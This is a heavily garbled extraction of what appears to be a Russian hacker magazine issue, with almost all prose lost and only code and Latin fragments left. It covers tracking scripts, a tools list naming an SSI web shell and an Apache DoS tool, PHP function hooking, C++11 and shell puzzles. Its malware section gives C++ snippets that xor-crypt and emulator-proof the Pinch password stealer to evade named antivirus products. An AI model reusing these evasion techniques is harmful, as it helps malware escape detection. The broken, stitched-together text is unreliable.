2004 .
2006 Google
90 .
,
,
.
3. , ,
( , , ), :
.
4. , , .
. :
, (, - ),
,
100.
.
5.
,
.
: SPYBOX
, .
. , / ,
,
. , 100 % , ( ,
).
-
SpyBox. , -,
, ,
, , ,
.
: HTML-,
</body>.
(
):
<noindex>
<script type='text/javascript'>
var script=document.createElement('script');
script.type='text/javascript';
...
if(localStorage.spybox)
{
var spybox_hash='a181a603769c1f98ad927e7367c7aa51';
var spybox_session=localStorage.spybox;
script.src='http://ua.robotreplay.net/fast.js';
}
...
document.getElementsByTagName("head")[0].
appendChild(script);
</script></noindex>
, , . :
, ,
- .
, . ,
IP
( ,
- ),
. . , SpyBox
: (
1000 ),
( , ,
,
).
ADWATCHER
SpyBox, , , .
,
, , ?
Adwatcher,
, SpyBox,
!
,
,
.
, !
2003 ,
Google 150 .
, ,
, Google
Clique , Google
. , Google ,
. ,
,
. , ,
2009 . Microsoft ,
,
Microsoft.
750 .
- .
, ,
.
: AdSense
- Adwatcher
,
Google Analytics
xakep.ru
.
-
( IP) (,
, , , , ).
( )
30- . ,
fraud reports, .
,
, ( ,
)
:
<script language="javascript" type="text/javascript">
...
document.write('
<img src="http://s8.adwatcher.net/demov3/tracker.
php?t='+ id[1]+'&ref='+r+'&land='+l+'"
style="border:0px;width:1px;height:1px;" />');
</script>
,
. Adwatcher 30
. ,
, ,
,
Adwatcher SpyBox.
,
: Google Analytics Piwik (
PHP-,
). , ,
,
. :
, ,
. , ,
( 40 ,
), ,
.
. ,
.
,
,
. ,
. ,
, .
, (
, ).
,
. ,
, ,
,
, :). z
X-Tools
:
BECHED
:
Max Artemev
:
Zdez Bil Ya
URL:
bit.ly/nIXs3V
URL:
widecap.ru
URL:
bit.ly/qLkZuZ
:
*nix/win
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
WEB-SHELL
SSI
C
WIDECAP
TWITTER REGGER
, ,
PHP-
. ,
. ,
- - .
,
,
.
.
? ! SSI
(server side includes) ,
, #exec
cmd.
.
SSI-,
PHP. :
;
SSI- ;
;
HTTP_COOKIE;
JavaScript.
WideCap , TCP/IP- -
-.
Winsock.
: SOCKSv4, SOCKSv5, HTTP/
HTTPS.
:
1. .
:
, , DNS, , .
2. -, .
3. .
,
.
4. .
, .
,
.
, :
(
e-mail);
;
(, , );
( avatars);
;
.
, ,
WideCap - :).
: ,
, ,
,
- ..
, . , ,
.
name.txt.
accounts.txt.
,
.
,
.
X-Tools
:
S4(uR4
URL:
bit.ly/pxjMKi
:
*nix/win
ALANA K!LL3R
,
HTTP- Apache (bit.ly/rqvHBi),
,
.
, ,
!
Alana K!LL3R
S4(uR4
. ,
.
, PoC
killapache.pl Kingcope.
--
,
. S4(uR4
PHP + cURL
Perl ,
(, ,
. .).
:
GET- (byte ranges)
,
.
:
Gremwell
:
Danijel Maxa MaXoNe
:
VaZoNeZ
URL:
www.gremwell.com
URL:
bit.ly/orsqKn
URL:
vazonez.com/page/
stegano
:
*nix/win
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
: Windows
2000/XP/2003 Server/
Vista/2008 Server/7
MAGICTREE:
SQL- MAXSQLI
SYNTAX BUILDER
BMP-
-
,
, , nmap? ?
, MagicTree.
.
(W3AF,
Acunetix, OpenVAS, Nessus, Burp, nmap . .),
(, nmap nikto)
(HTML, MS Word .).
Tree ()
,
,
Magic ()
,
,
.
,
,
www.gremwell.com/
documentation.
/
/HTTP-/
SQL-,
MaxSQLi Syntax Builder,
SQL-.
SQLi, error based. :
;
UNION;
WAF
;
;
;
;
;
, ;
string integer based.
,
,
. , ,
. Stegano,
BMP.
,
:
1. -.
2.
.
3. (,
).
4. (
)
.
, , ,
,
,
SQL-.
,
: .
.
MALWARE
deeonis (deeonis@gmail.com)
. ,
,
,
.
.
, ,
. , - ,
exe-.
;).
,
-.
, .
. , , ,
-, .
.
,
,
. ,
. ,
.
1. Kaspersky Crystal. . Kaspersky
Crystal .
,
.
, .
2. Dr. Web Security Space. Dr. Web Security Space,
.
FLY-CODE, , ,
.
3. ESET NOD32 Smart Security 5. ESET NOD32
Smart Security 5. ,
. , ,
,
.
4. Avast! Free Antivirus.
Avast! Free Antivirus.
, ,
.
. exe ,
. PE-
.
,
.
.
exe, API,
exe, , .
,
HLL-. ,
,
. , .
Pinch. exe- , .
Trojan-PSW.Win32.LDPinch.dlt, Dr. Web Trojan.Packed.1197,
NOD32 Win32/PSW.LdPinch.NMJ, Avast ,
Win32:LdPinch-NO [Trj]. ,
notepad.exe. ,
.
1
.
MZ- PE-,
. - notepad.exe.
,
,
API- .
Kaspersky Crystal.
.
. NOD32 Smart Security , Win32/PSW.LdPinch.NMJ.
Avast ,
, .
,
. - , ,
:).
,
. , .
xor
PVOID cryptBinary(PVOID pfile, DWORD fsize)
{
DWORD key = 0x45F983A0;
PVOID crypt_file = new BYTE[fsize];
CopyMemory(crypt_file, pfile, fsize);
for (size_t i = 0; i < (fsize / sizeof(DWORD)); i++)
{
((DWORD*)(crypt_file))[i] ^= key;
}
return crypt_file;
}
, . , , .
, . Dr. Web
. NOD32 Smart Security 5 :
, .
Avast, .
. . , xor, , ?
2
.
32- .
xor. ,
, ,
xor
MALWARE
KASPERSKY?
, Kaspersky Crystal,
. -,
Trojan-PSW.Win32.LDPinch.dlt,
, ,
Trojan-PSW.Win32.LDPinch.zie.
, -
.
,
, . ,
.
, ,
,
. , ,
, ,
, ,
,
.
Pinch, -
3
, , xor ,
Kaspersky Dr. Web,
.
. 142-
. ,
API.
CreateFile,
ntldr. ,
, , ,
INVALID_HANDLE_VALUE.
. ,
, , ,
CreateFile.
CreateFile
PVOID cryptBinary(PVOID pfile, DWORD fsize)
{
PVOID crypt_file = new BYTE[fsize];
CopyMemory(crypt_file, pfile, fsize);
HANDLE h = CreateFileA("e:\\ntldr",
FILE_READ_ACCESS, 0, 0,
OPEN_EXISTING, 0, NULL);
if (h != INVALID_HANDLE_VALUE)
{
DWORD key = 0x45F983A0;
for (size_t i = 0;
i < (fsize / sizeof(DWORD));
i++)
{
((DWORD*)(crypt_file))[i] ^= key;
}
}
return crypt_file;
}
NOD32
, CreateFile
, INVALID_HANDLE_VALUE.
, , , API.
, ,
. ,
, Trojan-PSW.Win32.LDPinch.zie.
Dr. Web Security Space . ,
, Infected Archive. NOD32 Avast Free
Antivirus .
.
4
:
, , ,
?
, ? ,
,
PE- .
,
, , . , notepad.exe
,
.
, : ,
NOD32 Avast .
.
, . Pinch
.
5
. xor
, Dr. Web,
.
256
.
, .
PVOID cryptBinary(PVOID pfile, DWORD fsize)
{
DWORD key = 0x45F983A0;
PVOID crypt_file = new BYTE[fsize];
CopyMemory(crypt_file, pfile, fsize);
//
CopyMemory(
crypt_file,
(VOID*)(((BYTE*)pfile) + 0x100 ),
fsize - 0x100);
CopyMemory(
(VOID*)(((BYTE*)crypt_file) + (fsize - 0x100)),
pfile,
0x100);
for (size_t i = 0; i < (fsize / sizeof(DWORD)); i++)
{
((DWORD*)(crypt_file))[i] ^= key;
}
return crypt_file;
}
,
, 4. Kaspersky Crystal Dr. Web
, . ,
, , , ,
- . ,
, , .
6
.
.
, .
, , C++
:
void swapMemBlock(ULONG begin, ULONG end)
{
ULONG half = (end - begin) / 2;
if (half < 0x4)
return;
BYTE *buff = new BYTE[end - begin];
ZeroMemory(buff, end - begin);
CopyMemory(buff, (PVOID)begin, end - begin);
CopyMemory((PVOID)begin, &buff[half], half);
CopyMemory((PVOID)(begin + half), buff, half);
delete[] buff;
swapMemBlock(begin, begin + half);
swapMemBlock(begin + half, end);
}
. Kaspersky, , NOD32 - .
. Kaspersky Crystal
. ,
, .
, Kaspersky Crystal,
. ! Dr.Web Security
Space . FLY-CODE
, . ESET
NOD32 Smart Security 5 Avast! Free Antivirus,
,
xor. ,
,
.
. ! z
MALWARE
(201074@mail.ru)
,
,
,
, , ,
, HIPS . . (
, :) ).
, .
DVD
ClamWin,
ClamAV
Windows, AVZ
.
WWW
: goo.gl/Usltc.
goo.gl/Kq3kw
,
(
-),
(BlackCash).
goo.gl/uI848
C++, goo.gl/ubwgt
C++.
1. , (: virulist.com)
,
,
. ,
:
,
,
.
,
( 1).
, . ,
, , ,
.
,
.
: , ,
,
. .
:
.
.
2. md5- ClamAV
: md5-,
( )
.
() , . ,
,
, ,
. ,
,
, . , -
3. HEX- ClamAV
MALWARE
,
, , ,
iChecker.
, .
. ,
, :
, .
. , Panda Software UltraFast,
AVZ ,
( )
( ).
iSwift ( iStream)
iChecker
NTFS.
,
.
4. , AVZ
.
. ,
md5-
.
ClamAV. , ,
, .
: main.cvd
daily.cvd.
. 2
md5-.
: md5-, , .
: ; , ; ,
5.
( ); - ;
, , . .
,
HEX-,
( 20 400 ),
.
,
. ,
.
(
)
(
). 3
HEX- daily.cvd
ClamAV. , .
, :
, , .
, . ,
, . ,
( )
, HEX.
.
, .
,
, .
,
-.
,
( , ,
JS-,
).
( ), -
, ,
:
EXECUTE READ,
WRITE;
PE- ;
;
- .
6. Gigpycll Win32.Palevo
.
( API- FindFirst FindNext)
. , ,
, API- ( NtOpenFile NtCreateFile).
,
.
, ,
,
.
. , ,
,
( ,
). , , .
: ,
, .
, ,
.
,
. , ,
.
,
.
( ,
). ,
, , ,
.
, , ,
( , ;
).
, ,
. ,
,
. ,
.
,
. , .
, :
,
( );
, ( ).
, ? ,
. :
;
( ,
, ,
, ,
photo.jpg.exe);
( , ,
PE-, .pif .com);
(
.exe .pif).
, , AVZ ( 4).
,
.
. text.
PE- , ,
, jmp -
,
.
, , , ,
( 5).
,
, ,
.
, ,
(.text, .data, .idata, .rdata, .reloc, .rsrc). -
MALWARE
, API- , DLL , , ,
GetProcAddress ,
-
.
, ,
. , , .
.
7. API-,
DLL explorer.exe,
, ( 6).
- , , AntiVirus Plus
McAfee ,
. , - API-
URLDownloadToFile ShellExecute.
, , VirtualAlloc, WriteProcessMemory
CreateRemoteThread.
, . ,
, . ,
,
.
,
.
, . asm,
(
C#, C, C Builder VB). explorer.exe, , ,
,
, ,
, ( 7, 8).
, . ,
? ,
(
, ),
.
, . .
(AVZ, , UPX).
, , ,
.
:
,
;
,
;
.
.
- .
. , ,
. ,
.
, , .
( ,
, , ,
) ,
.
, .
,
, .
.
:
1. , ( , , ,
. .).
2. .
3. .
4. .
:
5. ( ,
,
, ).
6. ( , , ),
, 7 8 ,
(, ).
7. 9.
8. .
9. ( ,
).
8. API-, -,
10. ( EIP).
11. ( ,
,
).
.
, ,
,
. ,
, .
EDX, ESP EIP.
. EDX EIP
,
. ESP,
. ESP ,
.
.
,
, , .
.
(
), . ,
,
.
.
, , ,
, , , .
, , HIPS, ,
- . z
MALWARE
(www.esagelab.ru)
PoC
,
, , .
?
.
,
, , . ,
,
malware, , -. ,
? ? ,
,
,
.
:
, ,
.
, Dynamic Binary
Instrumentation Engine. ,
-
,
.
UnFSG (bit.ly/v1nV81), (bit.ly/vNYAYA).
,
.
, ,
.
:
, , ,
, . ,
CreateToolHelp32Snapshot() SpyEye,
,
- (
,
), .
:
1. , CreateProcess() DEBUG_PROCESS.
2. WaitForDebugEvent()
,
.
3. , ,
. , SpyEye
CreateToolHelp32Snapshot(). ,
0xCC ( int 3) WriteProcessMemory().
4. ,
ReadProcessMemory()
.
,
, ,
. :
1. FileAlignment SectionAlignment.
2. ImageBase
,
.
3.
RawOffset VirtualOffset .
, , (
), , ,
IDA Pro LoadLibraryEx() DONT_RESOLVE_DLL_REFERENCES
.
PO: SIMPEUNPACKER
SimpleUnpacker,
GitHub
(github.com/Cr4sh/SimpleUnpacker). SimpleUnpacker
,
:
MALWARE
IDA Pro
input_file
, , '--bp'
, .
'--bp' .
dumped.exe.
,
, .
SimpleUnpacker.exe SpyEye:
C:\> SimpleUnpacker.exe dropper.exe --bp kernel32.dll!CreateToolhelp32Snapshot
[+] Breakpoint: kernel32.dll!CreateToolhelp32Snapshot()
[+] Process command line: "dropper.exe"
CREATE_PROCESS: ImageBase=0x00400000, StartAddress=0x00420090
DLL_LOAD: 0x7c900000 "ntdll.dll"
DLL_LOAD: 0x7c800000 "C:\WINDOWS\system32\kernel32.dll"
[+] Breakpoint on kernel32.dll!CreateToolhelp32Snapshot() has been set: 0x7c865b1f
DLL_LOAD: 0x7e410000 "C:\WINDOWS\system32\USER32.dll"
DLL_LOAD: 0x77f10000 "C:\WINDOWS\system32\GDI32.dll"
DLL_LOAD: 0x73000000 "C:\WINDOWS\system32\WINSPOOL.DRV"
DLL_LOAD: 0x77dd0000 "C:\WINDOWS\system32\ADVAPI32.dll"
DLL_LOAD: 0x77e70000 "C:\WINDOWS\system32\RPCRT4.dll"
DLL_LOAD: 0x77fe0000 "C:\WINDOWS\system32\Secur32.dll"
DLL_LOAD: 0x77c10000 "C:\WINDOWS\system32\msvcrt.dll"
DLL_LOAD: 0x3d930000 "C:\WINDOWS\system32\WININET.dll"
DLL_LOAD: 0x77f60000 "C:\WINDOWS\system32\SHLWAPI.dll"
DLL_LOAD: 0x78130000 "C:\WINDOWS\system32\urlmon.dll"
DLL_LOAD: 0x774e0000 "C:\WINDOWS\system32\ole32.dll"
, -
,
. ,
, TOP 100 VirusTotal SpyEye. ,
70% (
SpyEye
, ). ,
,
.
,
, . z
M0r1arty (moriarty@front.ru)
PHP
PHP-
PHP
,
.
,
.
WARNING
DVD
,
mysql_connect.
WWW
devzone.zend.com/
article/1021
3
.
habrahabr.ru/blogs/
php/98862/
.
http://bit.ly/
nm0fTy
.
gnuwin32.sourceforge.net/
.
http://pecl.php.net/
.
http://bit.ly/n3pnhK
,
PHP .
PHP
, Extension
Writing . .
ext
PHP. , , . ,
: config.m4
config.w32. UNIX-,
Windows. configure
, ; ,
. .
,
Makefile .
MINIT.
, , INI entry . .
:
Zend, , php.ini,
dl, deprecated.
RINIT. ,
.
RSHUTDOWN. , , RINIT.
web- Zend MSHUTDOWN. . /
MINIT/MSHUTDOWN,
RINIT/RSHUTDOWN.
Zend
. , malloc/free/calloc/realloc . .,
- (. 1). Zend
: Non-Persistent ( e) Persistent (
pe). , Persistent
( ) , Non-Persistent . , MINIT-RINIT-RSHUTDOWN-MSHUTDOWN ,
emalloc, emalloc MINIT,
RINIT
. , Non-Persistent , Persistent . malloc/free
.
ZTS
, ,
. PHP ZTS (Zend Thread-Safety). ZTS TSRM
(Thread Safe Resource Management). ,
(), .
TSRM :
TSRM.h, ZEND_BEGIN_
MODULE_GLOBALS ZEND_END_MODULE_GLOBALS
,
, ( )
ZEND_DECLARE_MODULE_GLOBALS,
, MINIT ZEND_
INIT_MODULE_GLOBALS.
, - . PHP.
tsrm_tls_table resource_types_table,
tsrm_ls. :
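static tsrm_tls_entry **tsrm_tls_table=NULL;
static tsrm_resource_type *resource_types_table=NULL;
void ***tsrm_ls;
typedef struct {
    size_t size;            // size of the resource
    ts_allocate_ctor ctor;  // constructor
    ts_allocate_dtor dtor;  // destructor
    int done;               // set once the resource type has been freed
} tsrm_resource_type;
struct _tsrm_tls_entry {
    void **storage;         // array of pointers to this thread's resources
    int count;              // number of elements in storage
    THREAD_T thread_id;     // thread identifier
    tsrm_tls_entry *next;   // next entry in the chain
};
GnuWin32 ,
UNIX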
tsrm_tls_table , tsrm_tls_enty .
resource_types_table, , , ( )
ZEND_INIT_MODULE_GLOBALS,
ts_allocate_id:
#define ZEND_INIT_MODULE_GLOBALS(module_name, \
globals_ctor, globals_dtor) \
ts_allocate_id(&module_name##_globals_id, \
sizeof(zend_##module_name##_globals), \
(ts_allocate_ctor) globals_ctor, \
(ts_allocate_dtor) globals_dtor);
TSRM_API ts_rsrc_id ts_allocate_id(ts_rsrc_id *rsrc_id,
size_t size, ts_allocate_ctor ctor,
ts_allocate_dtor dtor);
rsrc_id , , size
, ctor/dtor /
. ctor-, , , ,
( ).
PHP
tsrm_ls storage .
TSRMLS_C/TSRMLS_CC. ,
.
?
. tsrm_tls_table
. tsrm_tls_table resource_types_table SAPI,
tsrm_startup. tsrm_startup SAPI
tsrm_ls ts_resource_ex(0,NULL):
TSRM_API void *ts_resource_ex(
ts_rsrc_id id, THREAD_T *th_id);
ts_resource_ex tsrm_tls_table
tsrm_tls_entry , th_id ( NULL,
). ,
allocate_new_resource tsrm_tls_entry
, ,
tsrm_tls_entry.next .
TSRM. allocate_new_resource,
, storage .
( ) tsrm_resource_type.size,
(ctor) . , TSRM
. ( ) .
,
... . :
, .
, .
( ) .
PHP Windows.
PHP Linux ,
- .
PHP Windows. ,
.
, : nmake Makefile
Visual Studio php5ts.lib
. , ,
Windows, ,
?
PHP (goo.gl/TTgta). ,
. ,
VS2003, .
, GnuWin32.
(
Win-).
. MinGW. Cygwin, . ,
MinGW
./configure && make && make install.
,
PHP , ,
PHP libiconv. ,
, ,
MinGW PHP. .
. , MASM32
inc2l.exe.
inc- lib-.
_libiconv_version PROTO C ( , PHP
_libiconv_version). ...
PHP ,
. . ;)
. , VS2008.
PHP ( 5.3.8)
. (
, PHP).
, (
, - ),
. - GnuWin32?
, ,
, PHP,
Windows (,
). GnuWin32 ,
.
:
cd E:\gnuwin32\GetGnuWin32
download.bat
install E:\gnuwin32
,
Release_TS , php5ts.dll, php.exe . ,
!
Visual Studio, . , FileNew Project,
Makefile Project,
OK. General
Dynamic Library (.dll) Configuration Type.
C/C++/General Additional Include Directories
( ): G:\www\php-5.3.8;
G:\www\php-5.3.8\main\; G:\www\php-5.3.8\TSRM\; G:\www\php-5.3.8\Zend\. Linker/General Additional Library Directories G:\www\php-5.3.8\Release_TS. Linker/Input Additional
Dependencies php5ts.lib. .
(C/C++/
Preprocessor Preprocessor Definitions):
ZEND_WIN32=1
PHP_WIN32=1
WIN32=1
ZEND_DEBUG=0
ZTS=1
COMPILE_DL_XHOOKER=1
, Windows. . ;)
: ,
, , . .
ZEND_DEBUG , (
php5ts.lib, php5ts_debug.lib).
ZTS , ZTS ( PHP
Thread Safe Non Thread Safe).
ZEND_DEBUG ZTS
, - ,
: --.
--. read. ,
.
COMPILE_DL_XHOOKER, , .
configure, , (--withextension=shared). XHOOKER
.
?
, ,
. . ,
, ,
scan parse_date.c 21
(!), #pragma optimize ("", off ).
, ,
(
). Apache
, PHP-
. ,
MSVCR90.dll,
( , PE Tools
). ,
.
, MT.EXE ( , )
.
. .
- ,
, - . CMS
, ,
URL. , , CMS
.
get_included_files,
, , . ,
, . ,
fopen, file_get_contents, file readfile. , !
MySQL- .
. , , ( php.ini).
( : get_readed_files)
(, $_READED_FILES). php.ini (
, ini_set .htaccess
).
? PHP , . :
void zif_FUNCNAME(int ht, zval *return_value,
zval **return_value_ptr, zval *this_ptr,
int return_value_used TSRMLS_DC)
:
PHP_FUNCTION(FUNCNAME)
, , ,
, ,
( ). ,
, .
PHP
data->internal_function.handler = hacked_file;
}
.
( , ). , .
callback:
zval* argv[1];
zval* func;
zval* retval = NULL;
MAKE_STD_ZVAL(retval);
argv[0] = XH_G(_my_readed_files);
MAKE_STD_ZVAL(func);
ZVAL_STRING(func,"var_dump",0);
call_user_function(EG(function_table),
NULL, func, retval, 1, argv TSRMLS_CC);
Sara Golemon
, ZTS ? , .
, PHP
, , ,
. ,
- , ,
.
executor_globals,
EG. PHP- (HashTable*).
zend_function_entry,
.
, PHP
var_dump(). ,
callback. call_user_function,
. :
function_table, ( NULL),
, , ,
.
. MINIT :
zend_register_auto_global("_READED_FILES",
sizeof("_READED_FILES")-1,NULL TSRMLS_CC);
, _READED_FILES
($_READED_FILES). RINIT :
ZEND_SET_GLOBAL_VAR("_READED_FILES",
XH_G(_my_readed_files));
arr_hash = EG(function_table);
for(zend_hash_internal_pointer_reset_ex(
arr_hash, &pointer);
zend_hash_get_current_data_ex(arr_hash,
(void**) &data, &pointer) == SUCCESS;
zend_hash_move_forward_ex(arr_hash, &pointer))
{
if(!strcmp("file",
data->internal_function.function_name))
{
original_file = data->internal_function.handler;
EXECUTOR_GLOBALS
,
.
.
, , unset($GLOBALS['_
READED_FILES']),
.
,
EG (symbol_table). ,
( , ),
,
get_readed_files().
, TSRM.
PHP. .
, . , PHP-.
, SAPI
. . z
(bumshmyak@yandex.ru)
C++11:
C++
++
,
.
.
WWW
-
: bit.ly/
oVEtjX.
: bit.ly/
gRbESx.
FAQ ++11
:
bit.ly/1gNDCk.
++11
Danny Kalev: bit.ly/
mOTT91.
INFO
++0x,
2010
. ++
x
INTRO
2011 ISO C++ (ISO/IEC
14882:2011). C++11.
2003 .
,
. 2007
TR1,
, ,
.
ISO :
C++ ,
, ; C++
.
. -,
, . , rvalue references (move
semantics) constexpr. , . (threads), (regex),
(tuples), . ,
, ( 1320 ).
.
?
(https://wiki.apache.org/stdcxx/C%2B%2B0xCompilerSupport).
, , .
GCC,
GCC 4.6.1 .
C++11, -std=c++0x.
, .
,
.
auto,
, . :
auto x = 42; // int
auto pi = 3.14; // double
auto c = 'x'; // char
auto str = string("xxx"); // string
CHECKPOINT
, :
#include <type_traits>
auto x = 42;
static_assert(std::is_same<decltype(x), int>::value,
"42 is not int");
static_assert(!std::is_same<decltype(x), unsigned int>::value,
"42 is unsigned int");
std::is_
same<FirstType, SecondType>::value,
. type_traits,
. type_traits
.
, type_traits
, , ,
:
, C++11, , ,
. auto . , . ,
template <class T> struct is_pointer;
template <class T> struct is_const;
template <class T> struct add_const;
template <class T> struct remove_reference;
POD-
.
auto ,
- . :
struct Person {
    const char* name;
    int age;
};
first second, third.
DECLTYPE STATIC_ASSERT
, , . decltype(expression)
. :
auto x = 2; // int
auto y = 2.0; // double
decltype(x + y) z; // double
static_assert. :
static_assert(expression, error_string)
static_assert , expression
.
- . expression
, error_string.
static_assert:
static_assert(sizeof(int) >= 4, "too small int");
?
(std::initializer_list), , ,
. {...} ,
, .
std::initializer_list ,
, .
, , .
,
:
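#include <initializer_list>
#include <vector>
class SequenceClass {
public:
    // copy the elements of the brace-enclosed list into the vector
    SequenceClass(std::initializer_list<int> list) :
        data_(list.begin(), list.end())
    { }
    int size() const {
        return static_cast<int>(data_.size());
    }
private:
    std::vector<int> data_;
};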
x seq, .
++11 , -.
-
. ++03
:
string a = "first";
string b("second");
int c[] = {1, 2, 3};
struct D {
int m_;
D(int m) : m_(m) {}
};
, C++11,
, .
.
:
string a = {"first"};
string b{"second"};
int c[] = {1, 2, 3};
struct D {
int m_;
D(int m) : m_{m} {}
};
D d{0};
, ,
std::initializer_list,
, . :
vector<int> a(4); // 4
vector<int> b{4}; // 4
, .
:
class D {
int m_ = 42;
};
(const static) .
, , .
FOR
- .
for,
.
:
vector<int> seq = {1, 2, 3, 4, 5};
for (auto x : seq) {
- (-, ) , .
, . .
- :
[capture list](parameters) -> return type {
body
}
-, parameters, , body,
return type. (capture list)
, ()
. ,
.
,
left right.
vector<int> a = {1, 2, 3, 4, 5};
int left = 2;
int right = 4;
int count = 0;
for_each(a.begin(), a.end(), [left, right, &count](int x) {
if (x >= left && x <= right) {
++count;
}
});
cout << count << endl;
? for_each
( ), .
-. .
, .
,
, &, . ,
.
void. , return
.
, -
, - , .
- , :
class F {
public:
    F(int left, int right, int& count) :
        left_(left),
        right_(right),
        count_(count)
    { }
    void operator()(int x) const {
        if (x >= left_ && x <= right_) {
            ++count_;
        }
    }
private:
    int left_;
    int right_;
    int& count_;
};
Feature
GCC
Intel C++
MSVC
auto
4.4 (v1.0)
11.0(v0.9)
10.0 (v0.9)
decltype
4.3 (v1.0)
11.0(v1.0)
10.0 (v1.0)
static_assert
4.3
11.0
10.0
Builtin type_traits
4.3
10.0
8.0
Initializer lists
4.4
4.7
Range-based for-loop
4.6
Lambda
4.5 (v0.9)
11.0 (v0.9)
12.0 (v1.0)
10.0 (v1.0)
11.0 (v1.1)
mymap, .
R-value references
4.3 (v1.0)
11.1 (v1.0)
12.0 (v2.0)
10.0 (v2.0)
11.0 (v2.1)
for_each c -
:
for_each(a.begin(), a.end(), F(left, right, count));
:
[] ;
[=] , ;
[&] , , ;
[this] , .
.
1 N.
vector<int> a;
int last = 0;
std::generate_n(back_inserter(a), N, [last]() mutable {
return ++last;
});
,
mutable. , -,
:
std::function<signature>, ,
,
. ,
mymap,
, .
, mymap , neg,
.
( ) .
neg , ,
, . ,
. ,
. ,
,
, .
C++11 .
rvalue references:
. .
.
class MovableType {
MovableType(MovableType&& rhs);
MovableType& operator=(MovableType&& rhs);
};
, rvalue references
&&.
MovableType ,
. ,
,
.
++11 ,
.
OUTRO
ReturnType operator()(...) const { ... };
, mutable.
map:
vector<int> mymap(const vector<int>& input,
C++11, ,
. , ++
, , , .
, . , C++11 . z
(ivinside.blogspot.com)
!
,
, ,
.
1
1 100000.
. , .
.
inotify Linux,
. ,
.
. , ,
, . 1,
100000, 1.
: (a1 + an) * N/2, a1 ,
an , N . ,
, .
. , :
, , .
,
.
:
random2()
2 * random2()
, . , random4() ,
, . ,
random4() random3(), :
sum2
#
if deleted: print ' %s' % deleted
else: print ' '
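from random import randrange

def random2():
    """Return 0 or 1."""
    return randrange(0, 2)

def random4():
    """Return 0, 1, 2 or 3."""
    return random2() + 2 * random2()

def random3():
    """Return 0, 1 or 2."""
    result = random4()
    # 3 is outside the wanted range: discard it and draw again,
    # which keeps the three remaining outcomes equally likely
    if result == 3:
        return random3()
    return result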
2
random2(), 0
1. random3(), 0, 1 2.
,
() ,
.
3
1: random4().
2: .
random4()?
, , random2(). :
, . .
. .
, , ?
: .
random2()
random2()
, . ! , ,
, ,
, . , .
.
: , , . , .
1
.
,
?
2
:
tokens = []
for token in tokeniter:
    if token not in tokens:
        tokens.append(token)
: ,
.
. - (youtu.be/
DTWZqh64RcQ). , ,
.
1. ,
chmod() .
Python :
# python2 -c "import os; os.chmod('/bin/chmod', 0755)"
Perl:
# perl -e 'chmod 0755, "chmod"'
tokensiter ,
, .
,
tokensiter.
.
3
Linux?
4
# nmap -sS -Pn -n -iL active-hosts
.
,
/ filtered.
?
, .
, ,
, . ,
,
.
, :
= 1
, :
__()
_()
__(-)
:
+= 1
' ', , ''
, ? ,
.
.
4
/bin chmod -x chmod. .
, , :
#include <sys/types.h>
#include <sys/stat.h>
int main()
{
chmod("/bin/chmod", 0000755);
}
2. GCC .
:
$ cat - > chmod.c
int main () { }
^D
$ cc chmod.c
$ cat /bin/chmod > a.out
$ mv a.out new_chmod
$ cat /bin/chmod > new_chmod
# new_chmod +x /bin/chmod
: . a.out, .
cat /bin/chmod
.
GCC,
. ,
/bin/chmod , .
:
# cp /bin/ls /bin/ls_prev && cat /bin/chmod > /bin/ls &&
> /bin/ls +x /bin/chmod && mv /bin/ls_prev /bin/ls
3. tar, :
$ tar --mode 0755 -cf chmod.tar /bin/chmod
$ tar xvf chmod.tar
, --mode,
. .
4. Cpio , ,
, 21-. ,
:
$ echo chmod |
cpio -o |
perl -pe 's/^(.{21}).../${1}755/' |
cpio -i -u
5. , ,
, /bin/chmod, . Debian- :
# apt-get install --reinstall coreutils
init) :
# init 6
, :
0 ;
1 , ;
2 ;
3 , ;
4 , ;
5 + ;
6 .
5
,
blob.dat.
, ,
:
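def bstr(n):
    """Return the byte value n as a string of eight '0'/'1' characters."""
    return ''.join(
        [str(n >> x & 1) for x in (7,6,5,4,3,2,1,0)])
# open the file in binary mode
f = file('blob.dat', 'rb')
# read the whole file into memory
bytes = f.read()
# turn every byte into its binary form
# and join everything into one long string
sheet = ''.join([bstr(ord(c)) for c in bytes])
# count the '1' characters
print sheet.count('1')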
, .
:
,
. , popcnt.
Core i7 sse4.2.
: http://gurmeet.net/puzzles/fast-bit-counting-routines/.
init , , /etc/inittab.
3. Magic SysRq (
CONFIG_MAGIC_SYSRQ):
# echo 1 > /proc/sys/kernel/sysrq
# echo b > /proc/sysrq-trigger
4. : Alt + SysRq,
23 R E I S U B.
:
unRaw ( ),
tErminate ( SIGTERM ),
kIll ( SIGKILL , ),
Sync ( ),
Unmount ( ),
reBoot ( ).
,
CONFIG_MAGIC_SYSRQ (
).
7
IP-.
,
IP-,
, IP-.
Linux- .
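def ip2str(ip):
    """Convert a 32-bit number into a dotted IPv4 address string."""
    # an IPv4 address is 4 bytes long, so a number
    # that does not fit into 32 bits cannot be converted
    if ip > 0xffffffff:
        raise ValueError('number must be 32 bit')
    # shift first, then mask: >> binds tighter than &,
    # so every octet needs its own parentheses
    ipstr = '{0}.{1}.{2}.{3}'.format(ip >> 24,
        (ip >> 16) & 0xff,
        (ip >> 8) & 0xff,
        ip & 0xff)
    return ipstr
1.
shutdown:
# shutdown -r now
, halt reboot,
,
shutdown. , halt shutdown -h now, reboot
, shutdown -r now.
2. , init ( telinit,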
. z
,
- .
-. ?
, .
,
-,
. .
,
- .
, ,
, , ,
.
, - XXI ,
.
Hello world! ,
, ,
, . .
,
, ,
.
,
,
.
,
SMSBilling, .
float cost(), .
,
cost() , . , :
SMSBeeline, SMSMegafon SMSMts.
class SMSBilling
{
public:
    virtual float cost() = 0;
    ...
};
class SMSBeeline: public SMSBilling
{
public:
    virtual float cost()
    {
        ...
        return beelineCost;
    }
    ...
};
// SMSMegafon SMSMts SMSBeeline
. - , , SMSBilling.
, , , .
, ,
.
, . ,
()
,
. ,
-.
class SMSBeelineUA: public SMSBilling
{
public:
    virtual float cost()
    {
        ...
        return beelineUACost;
    }
    ...
};
class SMSBeelineBY: public SMSBilling
{
public:
    virtual float cost()
    {
        ...
        return beelineBYCost;
    }
    ...
};
// SMSMegafonUA, SMSMegafonUA, SMSMtsUA SMSMtsBY
// SMSBeelineUA SMSBeelineBY
,
, .
, SMSBilling,
. , SMSBeeline, SMSMegafon
SMSMts, SMSBeelineUA, SMSMtsBY . .
cost(), ,
.
,
. , ,
.
, - .
, -
?
cost() .
, ,
.
, , , :
class SMSBeelineUA: public SMSBeeline
{
public:
    virtual float cost()
    {
        ...
